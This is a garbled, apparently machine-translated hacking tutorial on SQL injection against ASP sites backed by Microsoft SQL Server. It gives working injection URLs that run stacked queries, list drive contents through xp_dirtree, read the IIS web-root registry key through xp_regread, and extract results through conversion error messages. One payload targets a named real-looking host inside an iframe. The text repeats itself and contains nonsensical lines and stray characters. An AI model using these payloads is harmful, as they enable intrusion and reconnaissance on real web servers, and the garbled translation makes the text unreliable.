Nothing in the afternoon
Looking at Angel wrote a path to find a meat chicken for a long time
Feeling the cattle
I found out if
Microsoft OLE DB Provider for SQL Server Error '80040E07'
Converting the varchar value '#sharedObjects' When the data type is a column of the data type INT, a syntax error occurs.
/html/showdetail_new.asp, line 9
This way, his method can not be used.
# Must be blocked
The way to get the path is even more costly.
Take a look at one of the words ~
src = "http://music.ty.sx.cn/html/showdetail_new.asp?id=214302; declare @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3svc / Parameters / virtula roots', '/', @Result Output Insert Into Cyfd (GYFD) VALUES (@RESULT); - " Frameborder = 0 width = 500 scrolling = Noshade HEIGHT = 400> iframe> I want to faint Angel method manually guess the success chance of managing the rear stage path, use xp_dirtree to get the information we want, the following method may be simple! First Announced once, maybe many friends are using, but it is absolutely very good! Let's write the path to the table! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; CREATE TABLE DIRS (Paths Varchar (100), ID INT) - Return: Normal information! Explain that the construction form is successful! carry on! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' - Return: Normal information. Note All directories written in the C drive are successful! Cool! The next step is to take a table! Violent. Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 Paths from DIRS) Back: Microsoft Ole DB Provider for SQL Server Error '80040E07' A syntax error occurred while converting the varchar value '@Inetpub' to the column of the data type INT. By exploding the directory name in the table! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (Select Top 1 Paths from DIRS WHERE PATHS NOT IN ('@ @Etpub')) - Finally, use the same method to get the web directory in E: / Web. Significant asking meals! 1. How can I get the web absolute path? Ha ha? This problem, I spent a long time to study. Everyone knows that Ms's things are placed in the registry. Web Location We can register? Br /> 碇 碇 剑 萌 萌? Br /> HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / W3SVC / parameters / Virtual roots uses the extended stored procedure XP_REGREAD we can get its value. EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE', 'System / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/' In this way, I will take it out, but the problem is coming, I take it out, how do we return it in IE? My method is: create a temporary Table, the table plus one field, the type is: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable. Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. submit: Declare @Result varchar (255) Exec Master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System / Controlset001 / Services / W3SVC / Parameters / Virtual Roots', '/', @Result Output Insert INTO Temporary Table (Temporary Field Name) VALUES (@Result); Then, let's submit: 1 = (Select Count (*) from Temporary Table Where Temporary Field Name> 1) In this way, IE reports the value of the web path you just plugged in. I also tried to use the variable to report the error, let IE return the value of the variable, the result is the loss Losing, so I thought of the way to build a temporary table added data! Finally, we delete the temporary table of the original built. Don't destroy domestic hosts ~ Lis0 reminded this
src = "http://music.ty.sx.cn/html/showdetail_new.asp?id=214302; declare @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3svc / Parameters / virtula roots', '/', @Result Output Insert Into Cyfd (GYFD) VALUES (@RESULT); - "
Frameborder = 0 width = 500 scrolling = Noshade
HEIGHT = 400> iframe>
I want to faint
Angel method manually guess the success chance of managing the rear stage path, use xp_dirtree to get the information we want, the following method may be simple! First
Announced once, maybe many friends are using, but it is absolutely very good! Let's write the path to the table!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; CREATE TABLE DIRS (Paths Varchar (100), ID INT) -
Return: Normal information! Explain that the construction form is successful! carry on!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' -
Return: Normal information. Note All directories written in the C drive are successful! Cool! The next step is to take a table! Violent.
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 Paths from DIRS)
Back: Microsoft Ole DB Provider for SQL Server Error '80040E07'
A syntax error occurred while converting the varchar value '@Inetpub' to the column of the data type INT.
By exploding the directory name in the table!
Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (Select Top 1 Paths from DIRS WHERE PATHS NOT IN ('@ @Etpub')) -
Finally, use the same method to get the web directory in E: / Web.
Significant asking meals!
1. How can I get the web absolute path?
Ha ha? This problem, I spent a long time to study. Everyone knows that Ms's things are placed in the registry. Web Location We can register? Br /> 碇 碇 剑 萌 萌? Br /> HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / W3SVC / parameters / Virtual roots uses the extended stored procedure XP_REGREAD we can get its value.
EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE',
'System / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/'
In this way, I will take it out, but the problem is coming, I take it out, how do we return it in IE? My method is: create a temporary
Table, the table plus one field, the type is: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable.
Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. submit:
Declare @Result varchar (255) Exec Master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'System / Controlset001 / Services / W3SVC / Parameters / Virtual Roots', '/', @Result Output Insert INTO Temporary Table (Temporary Field Name) VALUES (@Result);
Then, let's submit: 1 = (Select Count (*) from Temporary Table Where Temporary Field Name> 1)
In this way, IE reports the value of the web path you just plugged in. I also tried to use the variable to report the error, let IE return the value of the variable, the result is the loss
Losing, so I thought of the way to build a temporary table added data! Finally, we delete the temporary table of the original built.
Don't destroy domestic hosts ~ Lis0 reminded this